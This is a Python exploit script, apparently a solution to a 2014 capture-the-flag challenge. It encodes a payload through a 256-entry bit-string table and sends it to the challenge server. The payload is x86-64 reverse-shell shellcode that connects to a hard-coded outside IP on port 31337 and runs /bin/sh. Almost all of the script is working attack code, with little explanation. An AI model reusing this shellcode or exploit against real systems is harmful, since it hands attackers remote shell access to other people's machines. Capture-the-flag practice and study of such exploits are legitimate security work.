#!/usr/bin/env python3

import socket
import struct

import sys

a = []
for i in range(0x100):
    a.append(None)

a[0x00] = '0 0 '
a[0x01] = '1 0 0 1 1 1 0 '
a[0x02] = '1 1 0 1 1 1 0 0 '
a[0x03] = '1 1 0 0 0 0 0 0 0 '
a[0x04] = '1 1 1 1 0 0 0 1 1 0 '
a[0x05] = '1 1 1 1 1 0 1 0 1 1 0 '
a[0x06] = '1 1 1 1 1 0 0 1 1 0 '
a[0x07] = '1 0 0 1 0 0 1 0 '
a[0x08] = '1 1 1 0 0 0 1 1 0 '
a[0x09] = '1 0 1 1 1 0 0 0 0 1 0 '
a[0x0a] = '1 0 1 1 1 1 0 1 1 0 '
a[0x0b] = '1 1 0 0 1 0 0 0 1 1 1 0 '
a[0x0c] = '1 1 0 0 1 0 1 1 1 0 '
a[0x0d] = '1 0 1 0 0 1 1 0 1 0 '
a[0x0e] = '1 1 1 0 1 0 0 1 1 0 '
a[0x0f] = '1 1 1 0 0 0 0 1 0 '
a[0x10] = '1 1 1 0 0 0 1 0 0 '
a[0x11] = '1 1 1 0 0 0 0 0 1 1 0 '
a[0x12] = '1 1 1 1 1 0 1 1 1 0 '
a[0x13] = '1 1 1 0 1 0 0 0 0 0 0 1 0 '
a[0x14] = '1 1 1 0 1 0 0 1 0 0 '
a[0x15] = '1 1 0 0 1 0 0 0 1 1 0 0 '
a[0x16] = '1 1 1 0 1 0 1 0 0 0 1 1 0 '
a[0x17] = '1 1 1 0 1 0 1 0 0 0 1 0 0 '
a[0x18] = '1 0 1 0 0 1 1 1 1 0 '
a[0x19] = '1 0 1 1 1 0 0 1 0 0 1 0 '
a[0x1a] = '1 1 1 0 0 0 0 0 0 1 1 0 '
a[0x1b] = '1 1 1 0 1 0 0 0 0 0 1 0 '
a[0x1c] = '1 1 0 0 0 1 1 1 1 0 '
a[0x1d] = '1 0 1 0 0 0 0 0 0 0 0 0 1 0 '
a[0x1e] = '1 0 0 1 0 0 0 0 0 0 1 0 '
a[0x1f] = '1 0 1 0 0 1 1 0 0 1 0 '
a[0x20] = '1 0 1 1 1 0 1 0 '
a[0x21] = '1 0 0 1 1 0 0 0 1 0 1 0 '
a[0x22] = '1 1 0 0 0 0 0 1 0 1 0 '
a[0x23] = '1 1 0 0 1 0 0 0 0 1 1 1 0 '
a[0x24] = '1 0 1 0 1 0 1 0 1 0 '
a[0x25] = '1 0 1 0 1 1 1 1 0 '
a[0x26] = '1 0 1 1 1 0 0 1 0 0 0 0 '
a[0x27] = '1 1 1 1 0 0 0 1 0 0 1 1 1 0 '
a[0x28] = '1 0 0 1 0 1 1 1 1 0 '
a[0x29] = '1 1 1 0 1 0 0 0 0 1 0 '
a[0x2a] = '1 0 1 0 1 0 0 1 1 0 1 0 '
a[0x2b] = '1 0 1 0 0 0 0 0 0 0 0 1 0 '
a[0x2c] = '1 0 1 1 1 1 0 0 1 1 1 0 '
a[0x2d] = '1 1 1 1 1 0 1 1 0 1 0 '
a[0x2e] = '1 0 1 1 0 0 1 0 0 '
a[0x2f] = '1 1 1 0 0 0 0 0 0 1 0 0 '
a[0x30] = '1 1 1 1 1 0 0 0 1 0 '
a[0x31] = '1 1 1 0 1 0 1 1 1 1 0 '
a[0x32] = '1 0 1 0 1 0 0 1 1 0 0 0 '
a[0x33] = '1 0 0 1 1 0 0 0 1 0 0 0 '
a[0x34] = '1 0 1 1 1 1 1 0 0 1 0 '
a[0x35] = '1 0 1 0 1 0 1 0 0 1 0 0 1 0 '
a[0x36] = '1 0 1 0 1 0 0 1 0 1 1 0 '
a[0x37] = '1 1 1 0 1 0 1 0 0 0 0 1 0 '
a[0x38] = '1 0 0 1 0 0 0 0 0 1 0 '
a[0x39] = '1 0 1 1 1 1 0 0 1 1 0 0 '
a[0x3a] = '1 0 1 1 1 1 0 0 1 0 1 0 '
a[0x3b] = '1 1 1 0 0 0 0 0 0 0 1 0 '
a[0x3c] = '1 1 1 1 0 0 0 1 0 0 1 1 0 0 '
a[0x3d] = '1 1 0 0 1 0 0 0 0 1 1 0 0 '
a[0x3e] = '1 1 1 0 1 0 1 1 1 0 0 '
a[0x3f] = '1 0 1 1 1 1 0 0 1 0 0 0 '
a[0x40] = '1 1 1 0 0 1 1 0 '
a[0x41] = '1 1 0 0 0 1 0 1 0 '
a[0x42] = '1 0 1 1 1 1 0 0 0 1 1 0 '
a[0x43] = '1 1 0 0 0 1 1 1 0 0 '
a[0x44] = '1 0 1 1 1 1 1 0 1 1 0 '
a[0x45] = '1 1 1 1 1 1 0 '
a[0x46] = '1 1 1 0 0 0 0 0 0 0 0 0 '
a[0x47] = '1 0 1 1 1 1 0 0 0 1 0 0 '
a[0x48] = '1 1 0 1 0 0 '
a[0x49] = '1 0 1 0 0 0 1 0 1 1 0 '
a[0x4a] = '1 0 0 1 1 0 0 0 0 1 1 0 '
a[0x4b] = '1 0 1 0 0 0 0 0 0 0 0 0 0 1 0 '
a[0x4c] = '1 1 0 0 1 0 0 1 0 1 0 '
a[0x4d] = '1 0 1 1 1 1 1 0 1 0 0 '
a[0x4e] = '1 1 0 0 1 0 0 0 0 1 0 1 0 '
a[0x4f] = '1 0 1 0 1 1 1 0 0 1 0 '
a[0x50] = '1 0 1 0 1 1 1 0 1 0 '
a[0x51] = '1 0 1 0 1 1 1 0 0 0 1 0 0 1 0 '
a[0x52] = '1 0 0 1 1 0 1 1 0 '
a[0x53] = '1 1 1 0 1 0 1 0 0 1 1 0 '
a[0x54] = '1 1 0 1 1 1 1 1 0 1 0 '
a[0x55] = '1 1 0 0 0 1 0 0 0 '
a[0x56] = '1 0 1 0 1 0 0 0 1 0 1 1 0 '
a[0x57] = '1 0 1 0 1 1 1 0 0 0 1 0 0 0 0 '
a[0x58] = '1 0 1 1 0 0 0 0 0 1 0 '
a[0x59] = '1 0 1 0 1 1 1 0 0 0 0 1 1 1 0 '
a[0x5a] = '1 0 1 0 1 0 1 0 0 1 0 0 0 0 '
a[0x5b] = '1 0 1 0 0 1 0 0 1 0 '
a[0x5c] = '1 0 1 1 1 1 0 0 0 0 1 0 '
a[0x5d] = '1 0 1 1 1 0 0 1 1 0 '
a[0x5e] = '1 0 1 0 1 0 0 0 1 0 1 0 0 '
a[0x5f] = '1 0 1 1 0 0 0 0 1 0 '
a[0x60] = '1 1 0 1 1 0 0 1 0 '
a[0x61] = '1 0 0 1 0 1 0 1 0 '
a[0x62] = '1 1 0 1 1 0 1 0 0 1 0 '
a[0x63] = '1 1 1 1 1 0 1 0 1 0 0 '
a[0x64] = '1 0 1 1 0 0 0 1 0 '
a[0x65] = '1 1 1 1 0 0 1 1 0 '
a[0x66] = '1 1 0 0 1 0 1 1 0 0 '
a[0x67] = '1 0 1 1 1 0 0 0 1 0 '
a[0x68] = '1 0 1 0 1 0 1 1 0 '
a[0x69] = '1 1 0 0 1 1 1 1 0 '
a[0x6a] = '1 0 1 0 1 0 0 0 1 0 0 1 0 '
a[0x6b] = '1 0 1 0 1 0 0 1 0 1 0 0 '
a[0x6c] = '1 1 1 0 1 0 0 0 1 0 '
a[0x6d] = '1 1 1 0 1 0 1 1 0 1 0 '
a[0x6e] = '1 1 1 1 0 0 1 0 1 0 '
a[0x6f] = '1 1 0 1 1 0 0 0 1 0 '
a[0x70] = '1 0 0 1 0 1 1 1 0 0 '
a[0x71] = '1 1 1 1 0 0 0 1 0 0 1 0 1 0 '
a[0x72] = '1 0 0 1 0 0 0 1 0 '
a[0x73] = '1 0 1 0 0 0 1 1 0 '
a[0x74] = '1 0 1 0 1 1 0 0 '
a[0x75] = '1 1 1 0 0 1 0 1 0 '
a[0x76] = '1 0 1 0 0 0 1 0 1 0 0 '
a[0x77] = '1 0 0 1 1 0 0 0 0 1 0 0 '
a[0x78] = '1 1 1 0 1 0 1 1 0 0 0 '
a[0x79] = '1 1 1 1 1 0 0 0 0 0 1 0 '
a[0x7a] = '1 1 1 0 1 0 1 0 0 0 0 0 0 '
a[0x7b] = '1 0 1 0 1 0 0 0 1 0 0 0 0 '
a[0x7c] = '1 0 1 0 1 0 0 1 0 0 1 0 '
a[0x7d] = '1 1 1 0 0 1 0 0 0 '
a[0x7e] = '1 1 1 1 0 0 0 0 0 1 1 1 0 '
a[0x7f] = '1 1 0 0 1 0 0 0 1 0 1 0 '
a[0x80] = '1 0 1 0 0 1 1 1 0 1 0 '
a[0x81] = '1 0 0 1 1 0 0 0 0 0 1 0 '
a[0x82] = '1 1 1 1 0 0 0 1 0 0 1 0 0 0 '
a[0x83] = '1 1 0 0 0 0 1 0 '
a[0x84] = '1 0 0 1 0 1 1 0 1 0 '
a[0x85] = '1 0 0 1 0 1 0 0 0 '
a[0x86] = '1 0 1 0 0 1 0 0 0 0 '
a[0x87] = '1 1 1 1 0 0 0 1 0 0 0 1 1 0 '
a[0x88] = '1 0 1 0 0 0 1 0 0 1 0 '
a[0x89] = '1 1 1 1 0 1 0 '
a[0x8a] = '1 0 1 0 1 0 0 1 0 0 0 0 '
a[0x8b] = '1 1 1 0 1 1 0 '
a[0x8c] = '1 1 1 1 0 0 0 0 0 1 1 0 0 '
a[0x8d] = '1 0 1 0 0 0 0 1 0 '
a[0x8e] = '1 0 1 0 1 0 1 0 0 0 1 1 1 0 '
a[0x8f] = '1 1 1 1 0 0 0 1 0 0 0 1 0 0 '
a[0x90] = '1 1 0 1 1 0 0 0 0 0 '
a[0x91] = '1 0 1 0 1 0 1 0 0 0 1 1 0 0 '
a[0x92] = '1 0 1 0 1 0 0 0 0 1 1 1 0 '
a[0x93] = '1 1 1 1 0 0 0 1 0 0 0 0 1 0 '
a[0x94] = '1 1 1 1 0 0 0 0 0 1 0 1 0 '
a[0x95] = '1 1 1 1 0 0 0 1 0 0 0 0 0 0 '
a[0x96] = '1 1 0 0 1 0 0 0 0 1 0 0 0 '
a[0x97] = '1 0 1 0 1 1 1 0 0 0 0 1 1 0 0 '
a[0x98] = '1 0 1 0 0 0 1 0 0 0 0 '
a[0x99] = '1 0 1 0 1 0 1 0 0 0 1 0 1 0 '
a[0x9a] = '1 0 1 0 1 0 0 0 0 1 1 0 0 '
a[0x9b] = '1 0 1 0 1 0 1 0 0 0 1 0 0 0 '
a[0x9c] = '1 0 0 1 1 0 0 0 0 0 0 0 '
a[0x9d] = '1 0 1 0 1 1 1 0 0 0 0 1 0 1 0 '
a[0x9e] = '1 1 1 1 1 0 0 0 0 0 0 1 1 0 '
a[0x9f] = '1 0 1 0 0 0 0 0 0 0 0 0 0 0 1 0 '
a[0xa0] = '1 1 0 0 1 0 0 0 1 0 0 0 '
a[0xa1] = '1 1 1 1 1 0 0 0 0 0 0 1 0 0 '
a[0xa2] = '1 0 1 0 1 0 1 0 0 0 0 1 1 0 '
a[0xa3] = '1 1 1 1 1 0 0 0 0 0 0 0 1 0 '
a[0xa4] = '1 0 1 0 1 0 1 0 0 0 0 1 0 0 '
a[0xa5] = '1 1 1 1 1 0 0 0 0 0 0 0 0 0 '
a[0xa6] = '1 0 1 0 1 0 0 0 0 1 0 1 0 '
a[0xa7] = '1 0 1 0 1 0 0 0 0 1 0 0 0 '
a[0xa8] = '1 1 0 0 1 0 0 1 0 0 0 '
a[0xa9] = '1 0 1 0 1 0 1 0 0 0 0 0 1 0 '
a[0xaa] = '1 0 1 0 1 0 1 0 0 0 0 0 0 0 '
a[0xab] = '1 0 1 0 1 1 1 0 0 0 1 1 1 0 '
a[0xac] = '1 0 0 1 1 0 0 1 1 1 0 '
a[0xad] = '1 0 1 0 1 1 1 0 0 0 0 1 0 0 0 '
a[0xae] = '1 0 1 0 1 0 0 0 0 0 1 1 0 '
a[0xaf] = '1 0 1 0 1 1 1 0 0 0 0 0 1 1 0 '
a[0xb0] = '1 1 1 1 1 0 1 0 0 0 1 0 '
a[0xb1] = '1 0 0 1 0 0 0 0 0 0 0 1 0 '
a[0xb2] = '1 0 1 0 1 0 0 0 0 0 1 0 0 '
a[0xb3] = '1 0 1 0 1 1 1 0 0 0 0 0 1 0 0 '
a[0xb4] = '1 0 0 1 1 0 0 1 1 0 0 '
a[0xb5] = '1 0 1 0 1 0 0 0 0 0 0 1 0 '
a[0xb6] = '1 1 1 0 1 0 1 0 1 1 0 '
a[0xb7] = '1 0 1 0 1 0 0 0 0 0 0 0 0 '
a[0xb8] = '1 1 0 1 1 1 1 0 0 '
a[0xb9] = '1 0 1 1 1 1 0 0 0 0 0 0 '
a[0xba] = '1 1 1 1 0 0 0 1 0 1 0 '
a[0xbb] = '1 0 1 0 0 1 1 1 0 0 0 '
a[0xbc] = '1 1 1 1 0 0 1 0 0 1 0 '
a[0xbd] = '1 1 0 0 1 0 0 0 0 0 1 1 0 '
a[0xbe] = '1 1 1 1 1 0 1 1 0 0 0 '
a[0xbf] = '1 1 0 0 0 0 0 1 1 0 '
a[0xc0] = '1 0 1 1 0 0 1 1 0 '
a[0xc1] = '1 1 0 1 1 1 1 1 0 0 0 '
a[0xc2] = '1 0 1 0 0 0 0 0 1 0 '
a[0xc3] = '1 1 0 1 1 0 1 0 1 0 '
a[0xc4] = '1 1 1 1 1 0 1 0 0 1 0 '
a[0xc5] = '1 1 1 1 0 0 1 0 0 0 0 '
a[0xc6] = '1 1 1 1 1 0 0 0 0 1 0 '
a[0xc7] = '1 1 0 0 1 1 0 0 '
a[0xc8] = '1 1 0 1 1 1 1 1 1 0 '
a[0xc9] = '1 0 0 1 1 0 0 1 0 1 0 '
a[0xca] = '1 0 1 0 0 0 0 0 0 1 1 0 '
a[0xcb] = '1 0 1 0 1 1 1 0 0 0 0 0 0 1 0 '
a[0xcc] = '1 0 1 0 1 0 0 1 1 1 0 '
a[0xcd] = '1 0 1 0 1 1 1 0 0 0 1 1 0 0 '
a[0xce] = '1 1 1 0 1 0 1 0 1 0 0 '
a[0xcf] = '1 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 '
a[0xd0] = '1 1 0 0 1 0 1 0 0 '
a[0xd1] = '1 0 1 0 1 0 0 0 1 1 1 0 '
a[0xd2] = '1 1 1 1 0 0 0 0 0 1 0 0 0 '
a[0xd3] = '1 0 1 0 0 0 0 0 0 1 0 0 '
a[0xd4] = '1 0 0 1 1 0 0 1 0 0 0 '
a[0xd5] = '1 0 1 0 1 1 1 0 0 0 1 0 1 0 '
a[0xd6] = '1 0 0 1 1 0 0 0 1 1 0 '
a[0xd7] = '1 0 0 1 0 0 0 0 0 0 0 0 0 '
a[0xd8] = '1 0 1 1 1 1 1 1 0 '
a[0xd9] = '1 0 1 0 1 0 1 0 0 1 1 1 0 '
a[0xda] = '1 0 1 0 0 0 0 0 0 0 1 0 '
a[0xdb] = '1 1 1 1 0 0 0 0 0 0 1 1 0 '
a[0xdc] = '1 0 0 1 0 0 0 0 1 0 '
a[0xdd] = '1 0 1 0 1 1 1 0 0 0 0 0 0 0 0 '
a[0xde] = '1 0 1 0 1 0 1 0 0 1 1 0 0 '
a[0xdf] = '1 1 1 1 0 0 0 0 0 0 1 0 0 '
a[0xe0] = '1 1 0 1 1 0 1 1 0 '
a[0xe1] = '1 0 1 0 1 0 1 0 0 1 0 1 0 '
a[0xe2] = '1 0 1 1 1 1 1 0 0 0 1 0 '
a[0xe3] = '1 1 1 0 0 0 0 0 1 0 1 0 '
a[0xe4] = '1 1 0 0 1 0 0 1 1 0 '
a[0xe5] = '1 1 1 1 0 0 0 0 1 0 '
a[0xe6] = '1 0 1 1 0 0 0 0 0 0 0 '
a[0xe7] = '1 0 1 0 1 0 0 0 1 1 0 0 '
a[0xe8] = '1 0 1 1 0 1 0 '
a[0xe9] = '1 1 0 0 1 1 1 0 0 '
a[0xea] = '1 0 1 1 1 0 0 0 0 0 0 '
a[0xeb] = '1 1 0 0 0 1 1 0 0 '
a[0xec] = '1 1 1 1 1 0 0 1 0 0 '
a[0xed] = '1 1 1 1 1 0 1 0 0 0 0 0 '
a[0xee] = '1 1 0 0 1 0 0 0 0 0 1 0 0 '
a[0xef] = '1 1 0 0 1 0 0 0 0 0 0 1 0 '
a[0xf0] = '1 0 1 1 1 1 0 1 0 0 '
a[0xf1] = '1 1 0 0 1 0 0 0 0 0 0 0 0 '
a[0xf2] = '1 1 1 0 1 0 0 0 0 0 0 0 0 '
a[0xf3] = '1 0 1 1 1 0 0 1 0 1 0 '
a[0xf4] = '1 1 0 0 0 0 0 1 0 0 0 '
a[0xf5] = '1 1 1 0 1 0 1 0 0 1 0 0 '
a[0xf6] = '1 0 1 1 1 1 1 0 0 0 0 0 '
a[0xf7] = '1 0 1 0 0 1 1 0 0 0 0 '
a[0xf8] = '1 0 0 1 1 0 1 0 0 '
a[0xf9] = '1 1 1 1 0 0 0 0 0 0 0 1 0 '
a[0xfa] = '1 1 1 1 0 0 0 0 0 0 0 0 0 '
a[0xfb] = '1 1 1 0 0 0 0 0 1 0 0 0 '
a[0xfc] = '1 0 1 0 0 1 0 1 0 '
a[0xfd] = '1 1 0 1 1 0 1 0 0 0 0 '
a[0xfe] = '1 0 0 1 0 1 1 0 0 0 '
a[0xff] = '1 0 0 0 0 '

#shellcode = b"\x41" * 0x20
shellcode = b""

for i in range(1, 0xFE):
    shellcode += bytes([i,])
shellcode += b"\x90"*0x4

IPADDR=b"\x7f\x00\x00\x01" #/* 192.168.1.10 */

IPADDR=b"\x76\x4c\xfb\x94"
IPADDR=b"\x94\xfb\x4c\x76"
PORT=b"\x7a\x69" #/* 31337 */

Shellcode = (
b"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a"
b"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0"
b"\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24"
b"\x02" + PORT + b"\xc7\x44\x24\x04" + IPADDR + b"\x48\x89\xe6\x6a\x10"
b"\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48"
b"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a"
b"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54"
b"\x5f\x6a\x3b\x58\x0f\x05\x90\x90"
)
shellcode = Shellcode

def ToPython(data, variable_name="Shellcode"):
    output = "# Length: {0:x}\n".format(len(data))
    output += "{0} = (\n".format(variable_name)
    while data:
        chunk, data = data[:16], data[16:]
        output += "    b\"" + "".join(["\\x{0:02X}".format(x) for x in chunk]) + "\"\n"
    output += ")\n"

    return output

def encode(shellcode):
    binary = ""
    output = ""

    encoded = b""

    for x in shellcode:
        binary += a[x][:-2]

    binary = binary.replace(" ", "")

    while binary:
        byte, binary = binary[:8], binary[8:]

        if len(byte) != 8:
            break   

        print("AVANT", byte)
        # while byte[0] == "0":
        #     c, binary = binary[:1], binary[1:]
        #     byte = byte[1:] + c

        # print("APRES", byte)

        byte = int(byte, 2)
        #print(hex(byte))
        #sys.exit(0)
        print(hex(byte))
        encoded += bytes([byte,])

    return encoded


Shellcode = encode(shellcode)[:0xff]


print(hex(len(Shellcode)))



class Exploit(object):
    def __init__(self, host, port):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.connect((host, port))

        self.trigger()

    def trigger(self):


    	data = Shellcode
    	data = struct.pack("I", len(data)) + data



    	self.sock.send(data)

if __name__ == "__main__":
	e = Exploit("byhd_147e0accdae13428910e909704b21b11.2014.shallweplayaga.me", 9730)
	#e = Exploit("192.168.44.132", 9730)		